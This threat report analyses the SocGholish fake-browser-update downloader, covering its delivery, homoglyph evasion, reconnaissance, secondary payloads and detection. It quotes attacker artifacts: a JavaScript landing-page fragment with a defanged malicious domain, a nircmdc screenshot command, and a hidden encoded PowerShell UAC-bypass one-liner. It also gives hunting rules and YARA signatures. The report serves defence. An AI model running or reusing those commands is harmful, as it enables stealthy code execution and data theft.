Threat Report

SocGholish is a malware (class: downloader), and was first discovered in the wild in April 2018. It leverages drive-by-downloads and masquerades as genuine software update files for initial access. SocGholish is very active  and  most prominent  downloader malware.

This malware (also known as  FakeUpdate.exe) is associated with the Russian cybercrime APT group known as Evil Corp. The group is also believed to monetize the malware by selling the system access after it has been affected. After a machine is infected with SocGholish, it can have multiple other malware infections, based on the weaponization and internal recon data being sent to a  C2  server and downloading a secondary payload. 

SocGholish gains access to the system by presenting the users with a compromised website, which has the malware payload hosted, once the user is lured to this website, they are then again lured to update their browser.  Users falling to this trick, end up downloading the "update"  which is generally a javascript payload, hence launching the attack. 

FakeUpdates Popup window

Analysis

Initial Access

Users are redirected to compromised websites based on a sequence of browser validation. After victim browser information is gleaned, additional redirects are performed and the user is prompted to download a fake browser update.

After clicking the update button, the browser downloads, one of the three files:

var domain = '//gnf6.ruscacademy[.]in/';
var statisticsRequest = 'wordpress/news.php?b=612626&m=ad2219689502f09c225b3ca0bfd8e333&y=206';
var statTypeParamName = 'st';

var filename = 'download.hta';
var browser = 'Chrome';
var special = '1';  
var filePlain = window.atob(file64);
var a = document.getElementById('buttonDownload');

JavaScript code identified from the FakeUpdates landing pages

The malware payload often packaged as Update.js or Chrome.Update.zip is delivered from the compromised website. Earlier it was observed that the payload used to be packaged as a zip file and then delivered, but now there's a shift to direct delivery. This was because they tried to evade filename defence evasion by changing the name of the zip files, but now they have started following a more sophisticated method.

Lookalike Characters

SocGholish began using homoglyphs("lookalike" characters) to replace certain characters in the file name, this helped them evade a defence mechanism that leverages filename matching in order to detect anomalies. Example: the letters "a" and "c" were replaced with their UTF-8 Cyrillic lookalike characters "c" (0xd0a1) and "a" (0xd0a1), to get a filename which is perfectly the same to the human eye, but have different ASCII values.

Typical filename: Chrome.Update.zip Look-alike characters filename: Сhrome.Updаte.zip 

For detection tools, it would be totally different and hence slip through the perimeter defence. SocGholish has been seen regularly changing the filenames, swapping out different characters in different campaigns.

Character Lookalikes (homoglyphs)

Internal Reconnaissance

SocGholish is a malware intended and designed to spread other malware. This means it can pose various threats based on the second malware payload it downloads onto the device. Once it gains access to a device, it uses native WMI (Windows Management Instrumentation) calls to collect more information about the host. This internal reconnaissance is often followed by AD Enumeration, again followed by user and machine discovery.

This data is then exfiltrated back to the attacker in the SOCGholish C2 infrastructure and is used to determine which malware variants are best for the host as a part of their weaponization process.  

The information collected by the initial payload as a part of fingerprinting process includes:

It has also been observed that the attacker downloads & leverages a utility tool called nircdmc.exe to take png screenshots of the affected host and then send this data back to the SocGholish C2 Infrastructure via an HTTP POST request.

"C:\Users\User\AppData\Local\Temp\nircmdc.exe" savescreenshot
"C:\Users\User\AppData\Local\Temp\abcd.png"

Secondary payloads

"While Historically NetSupport had been a very common second payload of choice, SocGholish began showing a preference for other RATs in 2022 and this trend continued into 2023." - RedCanary

In some cases, within 10-15 minutes of initial compromise, it has been observed to deploy Cobalt strike or Impacket for post-exploitation activities.

SocGholish has also been known to distribute other malware variants, including AZORult, DoppelPaymer, Dridex, Gootloader, and NetSupport. SocGholish intrusions have often led to the devices being infected with ransomware, which poses a significant threat to the organization's data. Depending on variant it can be used to encrypt corporate data or steal and threaten to leak. Various ransomware families associated with SocGholish include Lockbit, WastedLocker, and others.

Just after the delivery of the secondary payload, post-exploitation reconnaissance leading to pre-ransomware activity and lateral movement is observed. The adversary behind SocGholish is tracked to be TA569 by Proofpoint.

Attacker Tactics

The threat actors involved make use of several utility modules like impacket, mimikatz and sessiongopher to harvest credentials and hashes information. It was also observed that the attacker employed a Windows UAC Bypass technique involving Empire’s Invoke-EventVwrBypass to launch executables using eventvwr.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x

Also, Event log artifacts revealed defence evasion techniques executed through PowerShell to remain stealth and undetected

Source: Mandiant Threat Intelligence

Similar Initial Access Trend

Since 2023, following the footsteps of SocGholish, new threats arose using TTPs similar to SocGholish, Scarlet Goldfinchm, ClearFake and FakeUpdateRU, and all followed a similar approach to deliver a fake browser update lure.

These newcomers have distinct TTPs for their attack lifecycle, and deliver a variety of stealers and RATs, some of them are: 

Fake browser updates have seen an uptrend in the following years, which is an initial access trend to keep an eye on. Proofpoint published an article on this fake browser update landscape.

Detection

Hunting opportunity

Windows Script Host spawned from browser & made external network conn.

parent_process == [any browser]
&&
process == wscript.exe

&&

has_external_networkconnection

WMI calls made by the file, using cmd or powershell

parent_process == wscript.exe
&&
process == powershell.exe || cmd.exe

&&

command_includes ("Get-WmiObject" || "Invoke-WmiMethod" || "wmic")

Executing screenshot utility tool nircmdc.exe

parent_process == powershell.exe  || cmd.exe
&&
process == nircmdc.exe

Windows UAC bypass using eventvwr.exe

parent_process == powershell.exe
&&
process == eventvwr.exe

&&

command_includes ("Invoke-EventVwrBypass")

Script files doing reconnaissance with whoami / net and writing the output to file

parent_process == wscript.exe

&&

process == cmd.exe

&&

command_includes  ('whoami /all >>' || 'net' || 'net.exe')

Enumerating domain trust relationships with nltest.exe

process == nltest.exe

&&

command_includes  ('/domain_trusts' || '/all_trusts')

Sample YARA Rules

Sample 1:

strings:

       $x = { 70 ?? 74 ?? 74 ?? 68 }
       $y = { 67 ?? 6e ?? 70 ?? 2e [1-3] 6c ?? 65 ?? 78 ?? 69 ?? 70 }
       $z = { 66 ?? 69 ?? 67 ?? 2e ?? 31 ?? 78 ?? 31 }

condition:

       $x and ($y or $z)  and filesize > 300 and filesize < 3000


Sample 2:

strings:

       $x = "&15)<<4)|("
       $y = { 69 6e 64 65 78 4f 66 28 ?? ?? 2e 63 68 61 72 41 74 28 ?? ?? 2b 2b 29 }
      $z = "ABCD"

    condition:

       $x and #y == 4 and (not $z) and filesize > 300 and filesize < 3000


IOCs  and File Samples for testing

IOCs

ThreatFox IOC Database: Link

SocGholish Malicous URLs Database: Link

Malware Samples (for testing)

SocGholish MalwareBazaar Database: Link

Source/References